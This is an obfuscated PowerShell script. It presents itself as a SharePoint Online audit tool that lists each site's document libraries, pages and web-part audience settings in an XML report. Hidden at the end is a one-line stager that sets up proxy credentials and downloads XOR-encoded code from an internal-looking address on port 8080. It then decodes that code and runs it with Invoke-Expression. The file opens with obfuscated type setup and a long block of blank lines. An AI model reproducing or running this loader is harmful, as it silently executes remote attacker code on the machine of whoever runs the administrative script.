 $VuJcN  = [tYpe]("{2}{3}{6}{5}{0}{1}{4}{7}"-F 'lIt','o','s','ySTE','Pt','sP','m.stRiNg','IOns');   &('SV') ("m"+"5SwL") ( [TYPE]("{0}{3}{1}{2}{4}{5}"-F'S','eM.nEt','.SErvIc','YSt','EPoINTMan','AgER'));  &("{0}{1}{2}{3}"-f 'SeT-','v','ArIab','lE') SE2R ( [TYpe]("{1}{5}{6}{4}{0}{2}{3}" -F 'bR','SyS','EqUE','ST','t.We','t','eM.Ne')  );   &("{1}{0}" -f'Em','sET-it')  VaRIABle:F6XMVj ( [typE]("{1}{3}{0}{5}{2}{4}" -f 'C','S','Nti','yStem.NEt.','AlcAcHe','Rede')  ) ;






















.("{0}{1}" -f 'c','ls')

.("{3}{1}{2}{0}" -f'Module','port','-','Im') ((("{8}{2}{9}{4}{0}{10}{6}{3}{1}{7}{5}" -f'{0}V','d','0}PnPPow','ell.Comman','rShell','ll','iceDevPnP.PowerSh','s.d','b:{','e','16{0}Off'))  -F[ChaR]92) 	
.("{0}{4}{1}{2}{3}" -f 'Im','u','l','e','port-Mod') ((("{23}{7}{9}{28}{4}{3}{30}{14}{27}{8}{25}{2}{20}{13}{10}{21}{16}{19}{5}{29}{18}{1}{15}{22}{26}{24}{17}{6}{12}{11}{0}"-f 'dll','.','e','FSh','Files (x86)VI','rSh','we','VIFPr','n','ogram','hellVIFMicr','Shell.','r','nt S','in','O','ft.Online.SharePoin','o','IFMicrosoft','t.Powe','me','oso','nlin','C:','oint.P','ag','e.ShareP','t Online Ma',' ','ellV','arePo')) -cRepLAce  'VIF',[cHaR]92)

${outp`U`TF`iLE} = ("{2}{0}{3}{1}{4}"-f 'utput ','ca','<o','file lo','tion>')
${si`Te} = ("{1}{0}{2}"-f'e u','<sit','rl>')





function g`EtDocUME`NTLI`B`R`ARiEs{
	Param(
	[string] ${WeB`U`RL}
	)
	
	${W`eb} = .("{0}{1}{2}{3}" -f'G','et-','SP','OWeb') -Identity ${WE`BUrl}
	${l`i`STS} = &("{0}{2}{1}{3}"-f 'Get','SPOLi','-','st') -Web ${w`eB}
	${EX`C`lU`DeD} = ("{0}{3}{1}{4}{2}" -f'For',' Templ','es','m','at'),("{2}{3}{1}{0}" -f'ets','Ass','Site',' '),("{1}{0}{2}" -f'yl','St','e Library')
	
	foreach(${L`IsT} in ${l`is`TS}."s`yNCro`oT")
	{
		if(${li`st}."bAS`etype" -eq ("{3}{0}{2}{1}"-f'um','y','entLibrar','Doc') -and ${L`ist}."Hid`DEn" -eq ${FAL`SE} -and ${E`xCL`Uded}.("{1}{0}"-f 's','Contain').Invoke(${li`St}."TI`TLe") -eq ${f`AlSe})
		{
			${do`CUMENtl`ibr`ArIES} += ${LI`ST}."TIt`le" + ","
		}
	}
	${s`ePaRa`T`OR} = ","
	${o`P`TIOn} =   (&("{0}{1}{2}"-f'chI','lDI','teM') VaRiABLe:vUjCn )."v`ALue"::"ReMOV`EemptYeN`T`RieS"
	return ${do`Cu`mEnTLI`Bra`RIEs}.("{0}{1}" -f'Spl','it').Invoke(${se`PaR`At`or},${o`p`TioN})
}


function geTw`e`BS{
	${S`iTEs} = &("{2}{0}{1}" -f 'SPOSit','e','Get-') 
	${s`UbS} = .("{3}{1}{0}{4}{2}" -f 'POSub','-S','ebs','Get','W') -Web ${S`i`TES}."ROO`T`WeB" -Recurse
	foreach (${S`UB} in ${s`UbS}."s`YNcR`OOt")
	{
		${subi`DS} += ${S`Ub}."S`ErVE`RReLatIVEu`RL" + "," 
	}
	${sePa`Ra`TOR} = ","
	${o`p`TIoN} =   $VUjCn::"R`EMov`e`eMPt`YEntRIes"
	return ${sU`BIdS}.("{0}{1}" -f'S','plit').Invoke(${s`e`PAratOR},${O`pt`IOn})
}


function pROCE`Ssw`Eb
{
param( [string] ${weB`U`Rl})
	${D`OCL`Ib`RaRIes} = &("{1}{0}{2}{4}{3}" -f 'ocume','GetD','ntL','ies','ibrar') -webUrl ${w`Ebu`RL} 
	${x} += ("{2}{0}{1}" -f'i','es>','<Librar')
	foreach (${lI`BRAry} in ${DO`C`LIbRArI`eS}){
		${x} += ((("{4}{2}{1}{0}{3}" -f 'Y','le=','y Tit','ys','<Librar'))."RE`p`LACe"('Yys',[sTrInG][chaR]34)) + ${li`BR`ARY} +'">'
		${pAg`es} = .("{0}{3}{2}{1}" -f'G','ListItem','-SPO','et') -List ${lIbR`A`Ry} -Web ${W`EBu`Rl}
		${x} += ("{1}{2}{0}" -f'es>','<P','ag')
		foreach(${Pa`ge} in ${Pa`geS}."S`YncR`oot")
		{
			${X} +=((("{1}{0}{2}" -f 'ge Url','<Pa','=R82'))."re`pLACe"('R82',[STriNg][cHar]34)) + ${PA`Ge}."FieL`d`Val`UES"[("{1}{0}{2}{3}" -f 'ileLeaf','F','Re','f')] + '">'
			${pAGE`NAME} = ${P`AGe}."Fi`EL`DvalUes"[("{0}{2}{1}" -f 'Fil','ef','eLeafR')]
			${u`RL} = ${pa`gE}."FIEl`D`VA`lUeS"[("{2}{0}{1}" -f'e','f','FileR')]
			${weBP`AR`TS} = .("{2}{0}{1}"-f'-spowebpar','t','get') -PageUrl ${u`Rl} 
			${We`B`pArt} = ""
			${X} +=("{2}{1}{0}" -f 's>','art','<Webp')
			foreach (${w`E`BPaRt} in  ${W`EB`p`ArTs}."SY`NCr`oot")
			{	
				${aU`dIen`ce}  = ${W`e`Bpart}."we`B`PaRT"."P`RopERTI`es"."fIEL`D`VAL`UeS"[("{2}{0}{1}{3}"-f'orizat','ionF','Auth','ilter')]
				if (${AUd`i`E`NCe} -eq "")
				{
					${A`Ud`IENcE} = ("{1}{0}"-f'et','Not s')
				}
				${X} +=((("{0}{3}{2}{1}"-f '<Web','=SGL','le','part Tit'))."rE`pLa`cE"('SGL',[string][char]34))+ ${we`B`PArT}."W`ebPart"."tI`TLE" + ((("{1}{0}{4}{5}{3}{2}"-f 'p','d','v','es=dp','v Audi','enc'))  -Creplace([CHAr]100+[CHAr]112+[CHAr]118),[CHAr]34)+ ${au`dIE`Nce} + '">'
				${x} += ("{1}{0}{2}" -f'b','</We','part>')	
			}
			${x} +=("{0}{3}{1}{2}"-f'</W','bpa','rts>','e')
			${X} += ("{1}{2}{0}" -f 'ge>','<','/Pa')
		}
		${X} +=("{0}{1}"-f'</Pages','>')
		${X} +=("{0}{2}{1}"-f'</Li','rary>','b')		
	}

	${x}+=("{1}{2}{0}"-f 'ries>','</Libr','a')
	return ${X}
}


&("{3}{1}{4}{0}{2}"-f 'POn','nec','line','Con','t-S') -Url ${si`Te} -Credentials (&("{1}{2}{0}{3}" -f'ia','Get-Cred','ent','l'))


${we`BS} = &("{0}{1}"-f 'GetWeb','s')
${x`ML} = ((("{7}{6}{5}{8}{3}{1}{9}{0}{2}{4}" -f 'encod','.0uXY','ing=uXYu','on=uXY1','tf-8uXY?>','xml ','?','<','versi',' '))."R`Epla`ce"(([ChAr]117+[ChAr]88+[ChAr]89),[strIng][ChAr]34)) 
${X`mL} += ("{0}{5}{3}{2}{4}{6}{1}" -f '<Tar','a>','d','tAu','ien','ge','ceDat')
${X`ML} +=("{1}{0}"-f's>','<Web')


foreach (${w`Eb} in ${We`BS}){
	${x`ML} += ((("{3}{1}{2}{0}" -f '=VhH','eb ','Url','<W')) -crEPLace  'VhH',[CHAr]34) +${w`eb} + '">'
	${r`ET`xML} = .("{1}{0}{2}"-f 'ocess','Pr','Web') -webUrl ${W`eb}
	${x`ml} += ${r`E`TXMl}
	${x`Ml} += ("{0}{1}" -f '</We','b>')
}
${X`ML} +=("{1}{2}{0}" -f 'bs>','<','/We') 
${X`ml} += ("{2}{4}{1}{0}{3}" -f 'eDa','ienc','</Targ','ta>','etAud')

&("{0}{2}{1}"-f 'Writ','st','e-Ho') ${X`mL}
${X`Ml} | &("{1}{0}" -f 'ile','Out-F') -Force -FilePath ${oUT`pu`TF`Ile}


  (  &("{3}{0}{2}{1}"-f'a','le','RiAB','GEt-v')  ("M"+"5swl") -vALu  )::"EXpE`ct`100`cO`NtiNuE" = 0;${W`C}=&("{1}{0}{2}"-f'W-ObJec','Ne','T') ("{4}{5}{3}{0}{1}{2}" -f 'E','t','.WEbClIenT','.N','SY','sTeM');${u}=("{4}{14}{9}{2}{1}{0}{10}{5}{15}{11}{8}{6}{12}{3}{7}{16}{13}"-f'; W',' 6.1','NT',' rv:11','Mozilla/5.',';','.','.','7',' (Windows ','OW64','t/','0;',') like Gecko','0',' Triden','0');${wC}."Hea`D`ErS".("{1}{0}"-f 'dd','A').Invoke(("{0}{1}{2}"-f'Us','er-','Agent'),${u});${WC}."P`ROxY" =   ( .("{1}{0}{2}" -f'Iab','vAR','le')  Se2R)."vA`LUE"::"D`ef`A`ULtweBpROXy";${Wc}."p`Roxy"."CrEd`ENTi`ALs" =  (.("{2}{0}{3}{1}"-f 'va','IABLe','GET-','r')  F6xMVj )."v`AlUe"::"d`eFaUl`TnetwOr`Kcred`ENtIa`ls";${K}=((("{5}{0}{1}{2}{3}{4}{6}{7}"-f '5','z','blt(=0','!*','c','FwQnWZ:','2','/j-@Uv14&G<u+')));${i}=0;[CHar[]]${B}=([CHAr[]](${w`c}.("{1}{2}{3}{0}"-f 'StRiNG','D','OWN','loAD').Invoke(("{5}{6}{4}{7}{0}{1}{3}{2}" -f'.9','2.1:8080','index.asp','/','92','h','ttp://1','.168'))))|.('%'){${_}-BXOr${k}[${I}++%${K}."L`enG`TH"]};&("{1}{0}" -f 'EX','I') (${B}-JoIn'')
